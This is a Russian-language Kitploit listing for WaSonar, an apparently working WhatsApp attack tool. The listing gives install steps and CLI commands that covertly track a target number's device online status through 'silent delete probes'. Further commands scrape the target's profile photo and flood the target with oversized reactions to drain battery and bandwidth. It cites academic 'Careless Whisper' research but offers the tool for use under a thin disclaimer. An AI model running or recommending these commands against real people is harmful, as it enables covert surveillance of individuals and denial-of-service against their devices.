Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
WaSonar — Инструмент разведки и истощения ресурсов WhatsApp. Возможности: отслеживание устройств в реальном времени, скрытое RTT-зондирование и стресс-тестирование протокола для исследований в области безопасности. | Kitploit
Инструменты/GitHubGitHub/ajayantoisdev/wasonar
OSINT (Разведка открытых источников)РазведкаАнализ уязвимостейЭксплуатацияСбор информацииТестирование на ПроникновениеМобильная безопасностьКонфиденциальность
GitHubajayantoisdev/wasonar

WaSonar

Инструмент разведки и истощения ресурсов WhatsApp. Возможности: отслеживание устройств в реальном времени, скрытое RTT-зондирование и стресс-тестирование протокола для исследований в области безопасности.

Репозиторий
51578 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Логотип WaSonar скриншот

License Version Node.js

Отказ от ответственности: Этот инструмент предназначен только для образовательных целей и исследований в области безопасности. Разработчики не несут ответственности за неправомерное использование. Пожалуйста, используйте его ответственно и этично.

WaSonar — это мощный CLI-инструмент, предназначенный для образовательных исследований, отслеживания устройств и стресс-тестирования протокола WhatsApp. Построен на основе Baileys.

Возможности • Установка • Использование


Возможности

  • Отслеживание устройств в реальном времени: Определение точного статуса онлайн/офлайн всех связанных устройств (телефон, веб, десктоп).
  • Обнаружение устройств: Список всех устройств, привязанных к целевому номеру (основной телефон + сопутствующие устройства).
  • Извлечение профиля: Получение фотографий профиля, статуса/информации «о себе» и JID.
  • Истощение ресурсов: Перегрузка устройств с помощью полезных нагрузок реакций большого размера (агрессивный/медленный режимы).

Установка

Через NPM (рекомендуется)

root@kitploit:~
npm install -g wasonar-cli

Через NPX (без установки)

root@kitploit:~
npx wasonar-cli <command>

Из исходного кода

root@kitploit:~
git clone https://github.com/AjayAntoIsDev/wasonar.git
cd wasonar
npm install

Использование

1. Вход

Сначала необходимо авторизоваться с помощью аккаунта WhatsApp.

root@kitploit:~
wasonar-cli login

Отсканируйте QR-код, который появится в вашем терминале.

2. Обнаружение устройств

Список всех устройств, подключённых к целевому номеру.

root@kitploit:~
wasonar-cli devices <target-number>

# Пример:
wasonar-cli devices 919876543210

3. Онлайн-статус и RTT

Основная функция. Отправка «тихих» проб для определения, находятся ли устройства онлайн, и измерения задержки.

root@kitploit:~
# Бесконечное количество проб (по умолчанию)
wasonar-cli online 919876543210

# Отправка заданного количества проб
wasonar-cli online 919876543210 --probes 5

# Сохранение результатов в файл
wasonar-cli online 919876543210 --output ./logs

Примечание: PENDING/OFFLINE означает, что сервер получил сообщение, но целевое устройство не подтвердило его получение.

4. Извлечение профиля

Получение фотографии профиля и статуса пользователя.

root@kitploit:~
# Показать информацию и скачать фотографию профиля
wasonar-cli profile 919876543210 --output ./profiles

5. Истощение ресурсов

⚠️ ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ. Отправка высокочастотных полезных нагрузок большого размера.

root@kitploit:~
# Агрессивный режим (по умолчанию: 250 запросов/с, полезная нагрузка 1 КБ)
wasonar-cli exhaust 919876543210

# Медленный режим (10 запросов/с, полезная нагрузка 500 Б)
wasonar-cli exhaust 919876543210 --aggression slow

# Задать длительность
wasonar-cli exhaust 919876543210 --duration 30

Методология

«Тихие» пробы

WaSonar использует «тихие пробы удаления» (Silent Delete Probes) для определения онлайн-статуса, не оповещая цель.

  1. Отправляет сообщение revoked (удаление) для несуществующего ID сообщения.
  2. Целевое устройство получает этот «запрос на удаление».
  3. Если устройство онлайн, оно отправляет delivery_receipt (статус 3) для протокольного сообщения.
  4. WaSonar перехватывает это подтверждение, чтобы подтвердить онлайн-статус и вычислить RTT.

Атака истощения

Основанная на исследовании «Careless Whisper», эта атака использует пробел в валидации обработки реакций в WhatsApp.

Технические детали

Хотя невалидные реакции не отображаются на телефоне цели, они всё равно принимаются и обрабатываются.

  • Лимиты полезной нагрузки: Серверы WhatsApp допускают полезные нагрузки реакций размером до 1 МБ.
  • Обработка: Клиент пытается обработать эти сообщения перед их отбрасыванием (лимит ~30 байт для корректного отображения), расходуя ресурсы.

Анализ воздействия

Данные исследований указывают на значительный потенциал для истощения ресурсов:

  • Раздувание трафика: Одна сессия может генерировать ~3,7 МБ/с (13,3 ГБ/час) скрытого трафика.
  • Разряд батареи: Быстрая обработка этих сообщений может разряжать батарею на 14–18% в час на современных смартфонах (протестировано на iPhone 13 Pro, S23), пока устройство находится в режиме ожидания.
  • Отказ в обслуживании: Потребление пропускной способности может привести к отказу в обслуживании других приложений на устройстве жертвы.

Цитирование

На основе исследования Gegenhuber и др., Венский университет и SBA Research:

root@kitploit:~
@inproceedings{gegenhuber2024careless,
  title={Careless Whisper: Exploiting Silent Delivery Receipts to Monitor Users on Mobile Instant Messengers},
  author={Gegenhuber, Gabriel K. and G{\"u}nther, Maximilian and Maier, Markus and Judmayer, Aljosha and Holzbauer, Florian and Frenzel, Philipp {\'E}. and Ullrich, Johanna},
  year={2024},
  organization={University of Vienna, SBA Research}
}

Создано AjayAnto

Скачать инструмент